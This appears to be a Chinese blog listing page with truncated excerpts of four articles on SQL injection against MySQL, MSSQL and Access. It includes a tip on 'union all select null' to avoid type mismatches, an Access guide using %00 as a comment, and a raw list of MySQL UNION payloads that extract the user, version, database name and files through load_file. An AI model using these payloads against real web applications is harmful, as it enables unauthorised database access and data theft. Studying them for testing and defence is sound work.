摘要: 在玩mysql的注入时候 union 是比较好用的 但是mssql和access下union会涉及到类型不匹配，无法将两个结果集合并的问题。解 决方法为将 union select 1,2,3,4 改为 union all select null,null,null,null 至于为什么用union all 而不用union呢 因为union会对结果集进行重复项的删除 删除重复项的时候使用了dis...阅读全文

摘要: 摘要： 这份文档是详细讨论SQL注入技术，它适应于比较流行的IIS+ASP+SQLSERVER平台。它讨论了哪些SQL语句能通过各种各样的方法注入到应用程序中，并且记录与攻击相关的数据确认和数据库锁定。 这份文档的预期读者为与数据库通信的WEB程序的开发者和那些扮演审核WEB应用程序的安全专家。 介绍： SQL是一种用于关系数据库的结构化查询语言。它分为许多种，但大多数都松散地基于美国国家标...阅读全文

摘要: and 1 = 2 union all select 1,2,3,user()and 1 = 2 union all select 1,2,3,version()and 1 = 2 union all select 1,2,3,database()and 1 = 2 union all select 1,2,3,load_file(0x文件路径)and 1 = 2 union all select...阅读全文

摘要: Access SQL注入指南 版本 0.2.1 描述 SQL查询及注释 注释符 Access中没有专门的注释符号.因此"/*", "--"和"#"都没法使用.但是可以使用空字符"NULL"(%00)代替: ' UNION SELECT 1,1,1 FROM validTableName%00 语法错误信息 "[Microsoft][Driver ODBC Microsoft Access]" ...阅读全文